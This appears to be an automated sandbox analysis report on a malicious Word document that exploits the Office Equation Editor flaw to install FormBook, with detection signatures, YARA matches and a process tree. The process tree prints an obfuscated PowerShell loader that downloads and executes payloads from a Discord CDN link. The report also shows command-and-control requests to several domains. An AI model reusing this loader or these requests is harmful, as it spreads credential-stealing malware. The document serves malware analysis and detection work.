Loading ...

Play interactive tourEdit tour

Analysis Report ENQ-015August 2020 R1 Proj LOT.doc

Overview

General Information

Sample Name:ENQ-015August 2020 R1 Proj LOT.doc
Analysis ID:288627
MD5:9c245d978c53949241e96b53f565a9a0
SHA1:3859c7450179c4d7ec7f7fc8f5d161f1674f886d
SHA256:d8dca1637184327ff59dfebda5b0cbc210a7f9c8d5c88c167a527a896003909d
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Document exploit detected (creates forbidden files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Found suspicious RTF objects
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2128 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2236 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 1492 cmdline: CmD.exe /C cscript %tmp%\paul.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 2288 cmdline: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
        • cmd.exe (PID: 2284 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 1296 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
  • powershell.exe (PID: 2296 cmdline: Powershell $B5A9C58F7112FA713F9D2073ED1665649B8F9B665808C15705730649C3EC4B4A8155713C3EDF=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,50,56,56,56,49,56,52,50,48,51,48,53,49,49,49,56,47,55,53,55,56,54,50,49,50,56,49,57,56,56,55,55,50,55,52,47,83,116,117,98,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,50,56,56,56,49,56,52,50,48,51,48,53,49,49,49,56,47,55,53,55,56,55,52,48,56,49,55,54,55,56,56,50,55,55,50,47,80,97,121,108,111,97,100,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,64,35,33,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$B5A9C58F7112FA713F9D2073ED1665649B8F9B665808C15705730649C3EC4B4A8155713C3EDF-join ''|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2344 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • cscript.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
          • cmd.exe (PID: 3032 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • firefox.exe (PID: 1544 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
        • help2dxlg.exe (PID: 2876 cmdline: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
        • help2dxlg.exe (PID: 2252 cmdline: 'C:\Program Files (x86)\Fntqll8l\help2dxlg.exe' MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ENQ-015August 2020 R1 Proj LOT.docMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0xcaa:$a3: 433a5c66616b65706174685c
  • 0xce4:$a3: 433a5c66616b65706174685c

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.calc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        12.2.calc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        12.2.calc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17539:$sqlite3step: 68 34 1C 7B E1
        • 0x1764c:$sqlite3step: 68 34 1C 7B E1
        • 0x17568:$sqlite3text: 68 38 2A 90 C5
        • 0x1768d:$sqlite3text: 68 38 2A 90 C5
        • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
        12.2.calc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          12.2.calc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\paul.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2236, ProcessCommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, ProcessId: 1492
          Sigma detected: Office product drops script at suspicious locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2128, TargetFilename: C:\Users\user\AppData\Local\Temp\paul.vbs
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule): Data: Command: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1492, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, ProcessId: 2288

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: ENQ-015August 2020 R1 Proj LOT.docVirustotal: Detection: 16%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2359405050.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.2270980659.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2164770798.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2359785911.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2359534677.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: 12.2.calc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Found potential equation exploit (CVE-2017-11882)Show sources
          Source: Static RTF information: Object: 2 Offset: 00005D29h
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 14_2_0095F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,14_2_0095F0D3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\paul.vbsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then sub dword ptr [esp+04h], 0Ch14_2_00955AD1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then mov edi, edi14_2_00956626
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_00175240
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_0017D3B0
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_0017E536
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_0017E540
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop ebx17_2_0016E6C0
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_0017E6F6
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi17_2_0017E6F8
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeCode function: 4x nop then pop esi17_2_0017DF50
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then push 001F2BC0h18_2_001F2B9C
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then dec dword ptr [ebp+08h]18_2_002281E0
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then mov edi, edi18_2_001ED258
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then mov edi, edi18_2_001E3398
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then push 00000050h18_2_0021C9A8
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then mov edi, edi18_2_00226A4F
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then add byte ptr [eax+00008000h], bh18_2_00227DD8
          Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exeCode function: 4x nop then arpl word ptr [eax], ax18_2_001FFE50
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 162.159.130.233:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.159.129.233:80
          Source: global trafficHTTP traffic detected: GET /attachments/722888184203051118/757862128198877274/Stub.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=8SPtAIzhs1kJDjEus8qRsOCx/qtdFd8iRUK/VAsrgKs7MSM9s1X09hsE3iAkaCEODcoJhA== HTTP/1.1Host: www.enlightenedleadersacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pua/?0bwLaJ=DI4ZKeLJ+JROT0GJyKxCLbLBFhDYDJpWnDBCM766gcJPggggQfC7bYRs5cJZLi3aVysgqw==&nnI8w=WBBxsZ-pnZFthb5&sql=1 HTTP/1.1Host: www.tiktkus.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=pb9Vn6p0QKF0PrcHHVnyLUR5E5TgtNlPO4FPz3Mk8e1ZsC+s/Ab/ERO6s36dji6qKC4V/Q==&sql=1 HTTP/1.1Host: www.78500907.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{11DEB0C5-C3B5-4777-B8A0-8FBD94489CF9}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /attachments/722888184203051118/757862128198877274/Stub.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=8SPtAIzhs1kJDjEus8qRsOCx/qtdFd8iRUK/VAsrgKs7MSM9s1X09hsE3iAkaCEODcoJhA== HTTP/1.1Host: www.enlightenedleadersacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pua/?0bwLaJ=DI4ZKeLJ+JROT0GJyKxCLbLBFhDYDJpWnDBCM766gcJPggggQfC7bYRs5cJZLi3aVysgqw==&nnI8w=WBBxsZ-pnZFthb5&sql=1 HTTP/1.1Host: www.tiktkus.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=pb9Vn6p0QKF0PrcHHVnyLUR5E5TgtNlPO4FPz3Mk8e1ZsC+s/Ab/ERO6s36dji6qKC4V/Q==&sql=1 HTTP/1.1Host: www.78500907.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: unknownHTTP traffic detected: POST /pua/ HTTP/1.1Host: www.tiktkus.infoConnection: closeContent-Length: 184696Cache-Control: no-cacheOrigin: http://www.tiktkus.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tiktkus.info/pua/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 62 77 4c 61 4a 3d 4c 71 30 6a 55 35 7a 47 6a 38 4e 46 53 69 28 32 6a 74 49 2d 55 39 79 6d 4f 44 54 46 4a 49 67 56 69 44 55 4c 4e 4b 36 76 73 35 46 33 67 42 49 6a 57 63 43 4e 4a 36 56 73 71 36 35 67 54 7a 61 4c 64 77 45 64 78 75 31 67 61 65 6b 75 75 51 43 74 45 48 5a 6c 46 77 69 59 68 4c 75 4c 42 7a 66 54 34 6e 67 74 51 57 6e 49 76 4d 4e 30 79 39 41 74 7a 73 42 30 7e 72 75 44 63 52 58 57 43 48 65 5a 55 62 77 49 6a 46 65 65 33 6a 37 55 46 59 64 53 54 68 72 48 72 7a 50 32 48 5a 77 35 72 68 72 57 55 4c 34 69 56 46 70 6b 50 43 4c 6e 61 46 45 66 39 2d 58 77 59 4a 4c 6c 7e 2d 76 4d 73 74 4c 55 28 66 63 6c 38 67 65 44 72 6b 6a 5a 43 72 6a 73 49 4f 30 4e 70 73 67 5a 6c 38 48 47 66 78 62 77 67 43 44 35 4f 52 75 53 7a 77 73 2d 70 71 4e 78 6a 34 74 4a 67 38 58 4a 39 58 28 4b 53 51 44 48 75 6b 74 59 6f 6c 4e 45 6f 49 74 5f 66 74 73 72 51 78 46 74 54 46 47 45 54 54 45 33 78 75 55 71 76 72 62 51 37 7a 51 58 52 59 72 50 76 30 38 41 36 61 47 62 55 71 38 58 59 72 5a 44 72 52 48 75 7a 66 65 42 6d 5a 52 7a 6b 4f 75 4e 71 79 7a 56 65 37 52 4a 4e 4e 65 59 76 63 64 4f 76 47 7e 54 4d 58 78 57 59 4d 42 44 36 4f 7a 73 67 55 5a 45 38 63 56 6e 58 66 48 67 4f 34 37 66 70 6f 42 44 7a 5f 67 55 76 6c 75 45 53 54 5a 41 54 6a 58 77 43 6e 74 4f 55 46 5a 39 7a 78 44 30 4d 70 76 34 4b 5f 7e 7a 37 55 56 49 77 34 67 72 78 78 4f 68 56 65 32 4c 54 6a 64 33 37 55 48 44 55 56 31 69 6a 4a 37 36 39 43 36 5f 76 48 64 47 34 48 52 55 58 55 75 5f 4e 6e 43 76 74 33 52 6d 46 34 44 4a 51 37 45 50 48 48 62 47 58 76 53 35 75 6f 6d 76 35 70 74 5f 46 56 36 49 67 48 35 69 7e 4d 59 4f 58 33 72 73 35 46 6b 32 38 7a 33 6a 59 49 7e 54 31 35 31 55 62 71 33 7a 4a 77 56 77 30 73 7e 43 55 65 41 6b 6a 61 47 34 64 7a 4b 5a 67 30 4e 49 78 4d 4e 52 7a 6e 77 4f 53 49 51 39 54 4a 73 79 64 58 33 4d 75 39 45 6e 46 54 66 45 48 73 67 69 48 5a 44 39 68 46 4a 6a 51 4d 6c 50 75 43 6c 35 50 46 59 